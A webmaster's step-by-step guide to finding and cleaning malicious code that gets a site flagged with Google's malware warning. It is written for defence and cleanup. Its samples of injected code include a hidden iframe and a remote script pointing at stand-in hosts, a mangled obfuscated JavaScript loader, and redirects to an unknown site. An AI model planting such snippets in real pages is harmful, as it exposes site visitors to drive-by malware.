|
25 Years of Programming
An open source source for C, C++, OWL, BASIC, MDB, XLS, DOT, and more... |
Home Projects Sitemap Search Blog Forum+Chat About Us Privacy Terms of Use Feedback FAQ Images Services Payments Humor Music |
How to remove the "This site may harm your computer" warning from your website's listings in Google search results, step by step
What is the warning?Google The warning is not a punishment or penalty, and it does not mean that Google, Yahoo, or StopBadware think you designed your site to be malicious. They all know that the overwhelming majority of webmasters do not create malicious pages on purpose and that you probably didn't, either. But they also don't want to send their customers to dangerous pages, and they do require you to do the necessary cleanup before they start referring visitors again. You are probably wondering what happened to your site that got it flagged. Why is your site flagged?Here are reasons why your website can be flagged with the "This site may harm your computer" warning in Google search results:
StopBadware and Google describe the criteria they use to determine whether a website is contributing to the badware problem. The Firefox 3+ and Chrome browsers use data from the Google Safe Browsing Service to warn users about suspected malicious sites. If your site is flagged in Google search results, Firefox 3 users are getting a warning that says, "Reported Attack Site!", and they are blocked from going there. Why antivirus scanning might not find the bad codeThe first idea that occurs to many webmasters is to do an AV scan on the site, but in many cases that will not find the problem. The next sections explain why. A) Scanning your website files on the serverScanning your server with an antivirus program will only work if the site is actually hosting the virus, which it often isn't. More likely, the virus itself is hosted on another computer. Your pages have been injected with iframe or JavaScript code that refers indirectly (with src=) to the virus on the other website. Thus, the AV program on your server sees only iframes and JavaScript which don't trigger virus alerts because they aren't viruses. The remote viruses aren't pulled in until the page is loaded into a visitor's browser. Then their browser fetches the code referred to by the src= property, and then they get a virus alert. If you scan your site with an antivirus program and it finds no viruses, that does not mean the site is clean. B) Downloading your site files to your PC and scanning them thereUsing a tool like FTP, Wget, or cURL to download the source code of your pages to your local PC and AV-scanning them there is also unlikely to find the virus, for the same reason given above: the actual virus is probably not on the pages. Wget in "recursive download" mode can retrieve all linked files, including ones from remote sites, but if some of them are viruses, you will be taking the unnecessary risk of downloading them directly to your PC. C) Risky - browse your pages with an antivirus program running on your PCIf you are determined to use the facilities of an AV program to scan your site, you can browse the site as if you were an ordinary visitor. This is risky because an increasing number of viruses are "polymorphic". Their code changes so frequently (every day or every time they are served) that antivirus programs can't keep up, and they do a poor job of detecting them:
In summary, antivirus scanning is not definitive. If it finds a problem, that's useful. If it doesn't find a problem, it means nothing because the virus might be on a different website, or might be encrypted and polymorphic, or your website's problem might not be a virus at all. It might be a malicious redirect in the .htaccess file that selectively only occurs for users coming from search engine results, or it might be a bad outlink on one or more of your pages. So the most thorough way to examine the site is to learn what to look for and then inspect your source files manually. How to search your pages for malicious code1) Discover which pages are flagged for malware and get clues about why they are flagged
Now that you have preliminary information about which pages are affected and what seems to be wrong with them, you can start searching for bad code. Some of it might have been identified in steps 9 and 10 above. 2) Remember to search your source code for badwareWhenever possible, view and search the source code of your pages, on your server. This allows you to see ALL the code, even if it is only put on the pages sometimes. Explanation: Some exploits put malicious code on pages only under certain conditions such as if the visitor is using Internet Explorer or if they came to your site from a Yahoo or Google search results page. Your particular viewing might not meet those conditions (such as if you're using Firefox or you went directly to the site without going through a search engine). If you examine pages with your browser's View Source command, you can think the page is clean even though at other times, or when other people view it, it's not. Examining the source code on your server lets you see all the code that's there. 3) Programs for searching pages for malicious code3a) Search one page at a time (recommended)
Starting with the most important flagged page (such as your home page), visually inspect the source code of each file for the types of malicious text described in Section 4 below. Malicious code is often inserted into web page files by robots (programs) using very simple rules for where to put it. Common locations are:
If your pages normally validate at W3C, go there and check your badware-flagged pages. Any errors you get might point directly to where the bad code is. 3b) Multi-file searchingWith multi-file searching, a program scans all files for the search string you specify, and reports all the instances it finds. This is an efficient way to search if you already know how to do it. Otherwise, this is probably not the best time to learn, and I'd recommend the one-page-at-a-time method, above. Dedicated server Do your search directly on the server with an operating system tool like grep. Shared server If you're already familiar with cron and grep, you can create a cron job to do the grep search as though you had shell (command line) access. Otherwise, download the pages (or your entire site) to your PC so you can search them there. Download with:
After downloading the pages to your PC, you can do the searching with any program that supports searching multiple files. Some examples:
4) Search strings to find malicious codeThese are useful search strings, whether you are searching one file at a time or all files at once:
Make sure all instances of src= and http:// refer to files on your site or to external sites you know and trust. Some common trusted sites that are not a problem are:
4a) What do malicious or invisible iframes look like?iframe code looks like this. If you don't recognize remotesite.com, the code is suspicious. This example combines two separate methods of making it an "invisible iframe", either one of which would work by itself: the width and height settings, or the style: <iframe src="http://remotesite.com/path/file" width="0" height="0" frameborder="0" style="display:none"></iframe> Whenever you find an iframe like this, do a web search on remotesite.com to find security-related websites, blogs, or forum posts that discuss it: remotesite.com malware OR hacked Be careful to avoid clicking any result that is the malicious website, or is a website that was infected by it! Some iframes are always associated with a particular type of exploit, so information about the one you found can save a lot of time discovering how your website got hacked. For example, iframes referencing gumblar.cn, martuz.cn, and a growing list of others are the result of FTP password theft from the webmaster's PC, so the security problem is on the PC, not the server. 4b) What do malicious JavaScript references look like?JavaScript references to external sites look like this. If you don't recognize remotesite.com, the code is suspicious. This code calls and runs a JS script that is hosted on a website that isn't yours. After a visitor loads your page, their browser fetches this JavaScript from the other site and runs it: <script language="JavaScript" src="http://remotesite.com/path/file.js"></script> 4c) What does malicious or obfuscated JavaScript code look like?Malicious JavaScript code directly on your pages (rather than being called by reference as described above) is often "obfuscated", "obscured", "encoded" to make it hard to tell what it does. It looks like an undecipherable jumble, like this (this has been greatly shortened and mangled to make it nonfunctional). Code like this is always suspicious and must be investigated: <script language="JavaScript">function nbsp() {var t,o,l,i,j;var s=''; s+='47116101120'; s+='097114099111'; s=s+'1203403211910'; s=s+'7121058110111112'; s=s+'9062032'; t='';l=s.length;i=0; while(i<(l-1)) {for(j=0;j<3;j++){t+=s.charAt(i);i++;} if((t-nescape(0xBF))>unscape(0x00)) t-=-(uescape(0x08)+unescae(0x30)); doc.rite(String.froCharCode(t));t='';}}nbsp(); </script> Sometimes VBScript is used instead, so the code starts with: If in doubt about whether a block of code is malicious, take a snippet of it and do a web search on it. 5) Which pages to search for malicious codeSearch all the files that have any part in creating your web pages: .html, .htm, .php, .asp, .aspx, .inc (include files), .cfm, and whatever other extensions you use. Inspect .js JavaScript and any other script files (including ones that you know originally came from a trusted source), watching for obfuscated code as described above. Some exploits try to do as little damage to the site as possible other than adding one little malicious JavaScript function into an otherwise normal .js file, to make it go undetected for as long as possible and be difficult to find. If you find nothing in your text files, it might be necessary to search your database for malicious code, which is discussed in Section 12) below. 6) Search your pages for links to flagged sitesIf your site can still be flagged for outlinking directly to another site that has badware on it (which, as mentioned earlier, I am not sure is still the case), only one-hop links count. If you link to a site that links to a site that has badware, that does not cause a flag. Having a large number of outlinks makes you especially vulnerable. If you link to 1000 other sites, what are the chances that they all manage to stay clean all the time? To investigate, make a list of all the sites you link to. For each one:
If any of the site's pages have the "This site may harm your computer" warning, you may be flagged for linking to them. Or they may be flagged for linking to you, if they do. There's no way to tell which it is. If you have a good relationship with the other site, tell them they've been flagged. They might not know about it. 7) Forum posts and blog commentsExamine the user-generated content on your site for malicious links that may have been posted by visitors or spambots. To be efficient, start with posts from a few days before the site first got flagged. Or start at the end and work backwards. For every link to another site, do a Google site: search to see if it's flagged. If it is, remove the link. 8) Advertisements that Google considers badwareIf you run affiliate ads or ads from advertising networks, you usually put the ads on the page by inserting iframe links or JavaScript into the code of your pages. The ads are retrieved from the third party sites only when your page is loaded into a visitor's browser. There are a few advertising networks that do things in their code that StopBadware and Google consider badware behavior. There are also ad networks that fail to properly screen the ads submitted by advertisers for distribution, so sometimes malicious ads get into their inventory. Make a list of the advertisers you are affiliated with. Do a web search on them or ask about them in a forum where there are people who might be up-to-date with which advertisers (if any) are currently problematic. An example of a web search that I have found useful is: advertiser badware OR StopBadware OR malware OR virus Bad ads can slip into even the big ad networks. DoubleClick clients got hit in 2007. An increasing amount of advertising is being served in Flash .swf files. These files can be flagged as badware, too. See the next section. 9) Out-of-date, exploitable, malicious Shockwave Flash filesThere have been numerous security vulnerabilities found in Flash. In addition, Flash scripting allows authors to embed badware behavior such as redirecting to a different website while the user is helpless to prevent it. Whether your Flash files serve third-party advertising or merely your own content, they will get flagged if Google determines they have malicious scripting or are otherwise a hazard to a visitor's PC. The easiest way to determine whether .swf files are the reason for your site being flagged is to remove the files as part of your initial site cleanup. After the badware flag is removed from your site, put the files back. If the flag returns, they're a problem. You can also try scanning your .swf files with the AdopsTools Online click checker, which gives you a report about the file's content. These links might help you investigate further:
Technical articles:
While you are investigating and fixing your site, you might want to keep Flash disabled in your browser in case you have a bad .swf file. In Internet Explorer, go to Tools > Manage Add-ons > Enable or Disable Add-ons > Add-ons that have been used by Internet Explorer. Disable two items: 1) Shockwave Flash Object and 2) Shockwave ActiveX Control (if present). For Firefox, there is a highly recommended plug-in called NoScript to block Flash, JavaScript, Java, and more. 10) Advertisements from otherwise legitimate ad networks that have been hacked and are now serving badwareEven if your advertisers normally use only legitimate methods, their ads might have been replaced with malicious code, which would start appearing on your pages instead of the usual ads. This is a danger anytime your pages pull some of their content from other sites. This is one case where the only way to detect the malicious code is to visit your site pages with your browser, to make sure all the ads are the legitimate ones you expect. If you are affected by the problems an advertising network is having, you won't be the only one, so a web search should turn up other similar reports. 11) Other third party contentIf you use any code that includes content from a remote site, such as
there is always the danger that a problem at the other site could affect your pages. 12) Database content from your CMS.If content for your site pages is stored in a Content Management System (CMS) database, it is possible that an SQL injection attack inserted malicious code into the database tables, and it is getting into your pages from there. One way to search or visually inspect and clean the data in your database tables is with cPanel > phpMyAdmin. Another way that should sometimes be workable is to go to cPanel > Backups and download a backup of the database in sql.gz format which is a plain text file when it's decompressed. If your antivirus software allows you to keep the downloaded file (it might detect the malware and quarantine the file instantly), and if the database isn't huge, you can view the text in a text editor, search and replace the malicious code, and upload the cleaned database back to the server. The easiest way to clean the database is to restore it from a known-good backup. 13) Rewrites or redirects in your .htaccess file(s)Examine your site configuration files such as Apache .htaccess and httpd.conf for code that sends your visitors to a malicious site. Look for lines containing the words Rewrite or Redirect with references to sites that aren't yours, and RewriteRule lines referring to google.com or yahoo.com. htaccess exploits often redirect only if the visitor came from a search engine. If your visitors report being redirected and you can't reproduce the behavior yourself, try going to your site from a Google search result. In your existing .htaccess files, search carefully and scroll all the way to the bottom of the file. Sometimes hundreds of blank lines are inserted before the malicious code. Look for new .htaccess files that might have been added to the site. Search all the folders inside /public_html and also the folder(s) above /public_html. 14) JavaScript redirectsJavaScript is another way your page can automatically redirect visitors to a different website. While examining the JavaScript in your site, look for code like the following. It can be in the JavaScript code in your pages, or, increasingly common, injected into your .js files that are called by your pages: window.location="http://unknownsite.com/" 15) Meta-refresh redirectsAn HTML meta-refresh is yet another way to automatically redirect visitors to a different website. Look for code like this within the <head></head> sections of your documents: <meta http-equiv="refresh" content="0;
url=http://unknownsite.com/"> These examples redirect to the other page after 0 seconds. 16) Check your error pagesIf you have custom error pages that you created and that are stored within your website, you probably examined those files already in the previous steps. However, many websites don't have custom error documents. In that case, the server uses its default error documents which are stored outside your website. You can test those by provoking a server error and checking the page you receive:
If you find bad links or viruses on your server's default error pages, it is a sign that the server, not just your website, has been compromised. Continue to the next step, and notify your webhosting company. 17) Server has a rootkit installedA rootkit is a type of infection that installs malicious programs to partially replace the server's operating system. It performs ordinary operating system tasks just like the OS would, but it also performs whatever malicious activity it is programmed to do. Because it controls operating system tasks, it can hide itself. A server compromised with a rootkit-type infection cannot be trusted at all, not even to properly report on its own status or give accurate directory listings. If you have thoroughly investigated all the preceding possibilities and you are sure everything inside your site is clean, it is possible that areas of your server outside your website are compromised (such as the default error pages in the previous step), or the server itself might be infected with software such as a rootkit. It might be injecting malicious content onto your pages in real time, after the pages are read from disk and just before they are sent out. One possible indication of a compromised server is a situation where, even though your request wasn't redirected to some other malicious website (that is, you are getting a page from your site), the page you get in your browser is completely different -- every time, or just sometimes -- from the one that you know is on your server. For example, the page on your server is completely clean, but when you request it with your browser or with wget, it's nothing but a page full of JavaScript, or a page with an iframe in it. One type of attack that works this way is called beladen. The behavior described above is not proof of a compromised server, however. For example, it is possible for the hacker to put new pages -- or even an entire website -- inside your website and then use .htaccess rewrites or PHP code to serve those pages instead of the requested ones. In this case, the pages are actually in your site and there is no server-wide compromise. With any luck, the investigation you've done to this point would already have uncovered either the hidden files or the rewrite code that is causing them to be served. If you truly believe your server is compromised and you're on shared hosting, there is nothing you can do to repair the damage to the server. File a support ticket with your webhost and ask them to investigate. While you wait, you can:
If you run a dedicated server, reformat the hard drive, reinstall and configure the operating system and server software, reinstall your site from known-good backups, --> fix the security vulnerability that allowed the compromise to occur <--, and start fresh. Server-wide compromises used to be rare. In 2009, with exploits such as beladen, the incidence is increasing. It is still almost the last thing you should suspect, but it's not as unlikely as it used to be. You might find the following articles useful if you suspect a server-wide compromise. The attacks discussed were from 2008, but their methods may have evolved into the more widespread attacks being seen today:
18) DNS cache poisoningPeople think of website addresses as text like http://website.com, but web addresses are really numbers called IP addresses. Before a browser can fetch a web page from a site, it must first send a query to a DNS Server to get the site's correct numeric address. Occasionally, someone manages to inject bad data into a DNS server so the IP address translations it returns are wrong. If someone tries to visit your website but their browser gets your IP address from a poisoned DNS server, they will be sent to a completely wrong website. That site might have malicious content, which could cause your site to be flagged for badware. When investigating your badware flag, this is a "way-out-there" scenario, rare and unlikely, but it has happened, so it's included here for completeness. 19) Ask for helpIf the reason your site is flagged remains a mystery, feel free to post a message in our forum. 20) Request a review from Google or StopBadwareAfter you have found and resolved all the likely reasons your site got flagged, file a request for review in the Webmaster Tools section of Google Webmaster Central, or on the StopBadware Request for Review form. If they find that the badware or badware links are gone, the warning flag is usually removed within 1 to a few days, even though their submission form says to allow longer. If you changed nothing on your site, but only submit the review request, the flag will not be removed. Google's accuracy at identifying malware is nearly 100%. Other resources
Keeping badware off your siteThe most important ways to keep badware off your site are
Comments, questions, and discussion welcome in the Forum. In case you're wondering, no this site has never been flagged. I have helped numerous webmasters get the warning removed, both in discussion forums and for hire. Notes
|
|
|
|